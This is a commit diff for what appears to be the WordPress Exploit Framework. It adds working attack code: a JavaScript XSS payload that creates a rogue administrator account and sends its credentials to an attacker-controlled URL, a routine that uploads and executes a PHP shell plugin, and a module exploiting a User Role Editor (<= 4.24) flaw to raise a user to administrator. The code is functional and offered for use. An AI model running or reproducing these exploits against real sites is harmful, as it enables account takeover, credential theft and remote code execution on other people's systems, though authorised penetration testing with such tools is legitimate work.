Merge pull request #14 from rastating/new_modules_2016-05

New modules 2016-05

Author: rastating

.rubocop.yml

@@ -43,3 +43,8 @@ Documentation:
 Style/IndentArray:
   Enabled: false
   Description: 'A lot of modules use a sensible indentation level that Rubocop does not like.'
+
+Lint/UnusedMethodArgument:
+  Description: 'A number of classes will contain unused parameters for documentation purposes.'
+  Exclude:
+    - 'lib/wpxf/**/*'

data/js/create_wp_user.js

@@ -0,0 +1,24 @@
+var create_user = function () {
+  var nonce = this.responseText.match(/id="_wpnonce_create-user" name="_wpnonce_create-user" value="([a-z0-9]+)"/i)[1];
+  var data = new FormData();
+
+  data.append('action', 'createuser');
+  data.append('_wpnonce_create-user', nonce);
+  data.append('_wp_http_referer', '$wordpress_url_new_user');
+  data.append('user_login', '$username');
+  data.append('email', '$email');
+  data.append('pass1', '$password');
+  data.append('pass2', '$password');
+  data.append('role', 'administrator');
+
+  postInfo("$wordpress_url_new_user", data, function () {
+    var a = document.createElement("script");
+    a.setAttribute("src", "$xss_url?u=$username&p=$password");
+    document.head.appendChild(a);
+  });
+};
+
+ajax_download({
+  path: "$wordpress_url_new_user",
+  cb: create_user
+});

lib/cli/context.rb

@@ -15,7 +15,7 @@ def verbose?
 
     def load_module(path)
       match = path.match(/(auxiliary|exploit)\/(.+)/i)
-      fail 'Invalid module path' unless match
+      raise 'Invalid module path' unless match
 
       type = match.captures[0]
       name = class_name(match.captures[1])

lib/cli/loaded_module.rb

@@ -45,7 +45,7 @@ def run
     end
 
     def check
-      return unless module_loaded?
+      return unless module_loaded? && module_can_execute?
       state = context.module.check
 
       if state == :vulnerable

lib/wpxf/wordpress/fingerprint.rb

@@ -54,6 +54,17 @@ def check_plugin_version_from_readme(name, fixed = nil, introduced = nil)
     check_version_from_readme(:plugin, name, fixed, introduced)
   end
 
+  # Checks a plugin's changelog for a vulnerable version.
+  # @param plugin_name [String] the name of the plugin.
+  # @param file_name [String] the name of the file that contains the changelog.
+  # @param fixed [String] the version the vulnerability was fixed in.
+  # @param introduced [String] the version the vulnerability was introduced in.
+  # @return [Symbol] :unknown, :vulnerable or :safe.
+  def check_plugin_version_from_changelog(plugin_name, file_name, fixed = nil, introduced = nil)
+    changelog = normalize_uri(wordpress_url_plugins, plugin_name, file_name)
+    check_version_from_custom_file(changelog, /=\s(\d\.\d(\.\d)?)\s=/, fixed, introduced)
+  end
+
   # Checks a custom file for a vulnerable version.
   # @param url [String] the relative path of the file.
   # @param regex [Regexp] the regular expression to extract the version.

lib/wpxf/wordpress/shell_upload.rb

@@ -46,10 +46,17 @@ def payload_body_builder
   def uploaded_payload_location
   end
 
+  # Called prior to preparing and uploading the payload.
+  # @return [Boolean] true if no errors occurred.
+  def before_upload
+    true
+  end
+
   # Run the module.
   # @return [Boolean] true if successful.
   def run
     return false unless super
+    return false unless before_upload
 
     emit_info 'Preparing payload...'
     @payload_name = "#{Utility::Text.rand_alpha(payload_name_length)}.php"

lib/wpxf/wordpress/urls.rb

@@ -106,4 +106,9 @@ def wordpress_url_new_user
   def wordpress_url_uploads
     normalize_uri(wordpress_url_wp_content, 'uploads')
   end
+
+  # @return [String] the edit profile page URL.
+  def wordpress_url_admin_profile
+    normalize_uri(wordpress_url_admin, 'profile.php')
+  end
 end

lib/wpxf/wordpress/user.rb

@@ -16,4 +16,18 @@ def wordpress_user_exists?(user)
 
     false
   end
+
+  # @param cookie [String] a valid session cookie.
+  # @return [Hash, nil] the profile form fields and their default values.
+  def wordpress_user_profile_form_fields(cookie)
+    res = execute_get_request(url: wordpress_url_admin_profile, cookie: cookie)
+    return nil unless res.code == 200
+
+    fields = {}
+    res.body.scan(/<input.*?name="(.*?)".*?value="(.*?)".*?>/i) do |name, value|
+      fields[name] = value
+    end
+
+    fields
+  end
 end

lib/wpxf/wordpress/xss.rb

@@ -4,9 +4,7 @@
 module Wpxf::WordPress::Xss
   include Wpxf
   include Wpxf::Net::HttpServer
-  include Wpxf::WordPress::Login
   include Wpxf::WordPress::Plugin
-
   include ERB::Util
 
   # Initialize a new instance of {Xss}.
@@ -64,38 +62,19 @@ def xss_ascii_encoded_include_script
   # @return [String] a script that will create a new admin user and post the
   #   credentials back to {#xss_url}.
   def wordpress_js_create_user
-    username = Utility::Text.rand_alpha(6)
-    password = Utility::Text.rand_alpha(10)
-
-    %Q|
+    variables = {
+      '$wordpress_url_new_user' => wordpress_url_new_user,
+      '$username' => Utility::Text.rand_alpha(6),
+      '$password' => Utility::Text.rand_alpha(10),
+      '$email' => "#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com",
+      '$xss_url' => xss_url
+    }
+
+    %(
       #{js_ajax_download}
       #{js_ajax_post}
-
-      var create_user = function () {
-        var nonce = this.responseText.match(/id="_wpnonce_create-user" name="_wpnonce_create-user" value="([a-z0-9]+)"/i)[1];
-        var data = new FormData();
-
-        data.append('action', 'createuser');
-        data.append('_wpnonce_create-user', nonce);
-        data.append('_wp_http_referer', '#{wordpress_url_new_user}');
-        data.append('user_login', '#{username}');
-        data.append('email', '#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com');
-        data.append('pass1', '#{password}');
-        data.append('pass2', '#{password}');
-        data.append('role', 'administrator');
-
-        postInfo("#{wordpress_url_new_user}", data, function () {
-          var a = document.createElement("script");
-          a.setAttribute("src", "#{xss_url}?u=#{username}&p=#{password}");
-          document.head.appendChild(a);
-        });
-      };
-
-      ajax_download({
-        path: "#{wordpress_url_new_user}",
-        cb: create_user
-      });
-    |
+      #{read_js_file_with_vars('create_wp_user.js', variables)}
+    )
   end
 
   # Default HTTP request handler for XSS modules which will serve the script
@@ -127,22 +106,36 @@ def upload_shell(username, password)
     cookie = authenticate_with_wordpress(username, password)
     return false unless cookie
 
-    emit_info 'Uploading payload...'
     plugin_name = Utility::Text.rand_alpha(10)
     payload_name = Utility::Text.rand_alpha(10)
+
+    emit_info 'Uploading payload...'
     unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
       emit_error 'Failed to upload the payload'
       return false
     end
 
+    execute_payload(plugin_name, payload_name)
+
+    true
+  end
+
+  # @return [Boolean] true if the XSS shell upload was successful.
+  def xss_shell_success
+    @success
+  end
+
+  private
+
+  def execute_payload(plugin_name, payload_name)
     payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
     emit_info "Executing the payload at #{payload_url}..."
     res = execute_get_request(url: payload_url)
+    emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
+  end
 
-    if res && res.code == 200 && !res.body.strip.empty?
-      emit_success "Result: #{res.body}"
-    end
-
-    true
+  def read_js_file_with_vars(name, vars)
+    matcher = /#{vars.keys.map { |k| Regexp.escape(k) }.join('|')}/
+    File.read(File.join(Wpxf.data_directory, 'js', name)).gsub(matcher, vars)
   end
 end

modules/auxiliary/user_role_editor_privilege_escalation.rb

@@ -0,0 +1,55 @@
+class Wpxf::Auxiliary::UserRoleEditorPrivilegeEscalation < Wpxf::Module
+  include Wpxf::WordPress::User
+
+  def initialize
+    super
+
+    update_info(
+      name: 'User Role Editor <= 4.24 Privilege Escalation',
+      desc: 'The User Role Editor plugin, in versions 4.24 and below, '\
+            'allows authenticated users to escalate their user role to '\
+            'that of an administrator.',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8432'],
+        ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
+      ],
+      date: 'Apr 04 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('user-role-editor', '4.25')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def build_update_body
+    fields = wordpress_user_profile_form_fields(session_cookie)
+    return nil unless fields
+    fields.merge('ure_other_roles' => 'administrator')
+  end
+
+  def run
+    return false unless super
+
+    body = build_update_body
+    unless body
+      emit_error 'Failed to build payload'
+      return false
+    end
+
+    res = execute_post_request(url: wordpress_url_admin_profile, body: body, cookie: session_cookie)
+    unless res.code == 302 || res.code == 200
+      emit_error "Request returned code #{res.code}"
+      return false
+    end
+
+    emit_success "User role for #{datastore['username']} has been escalated to administrator"
+    true
+  end
+end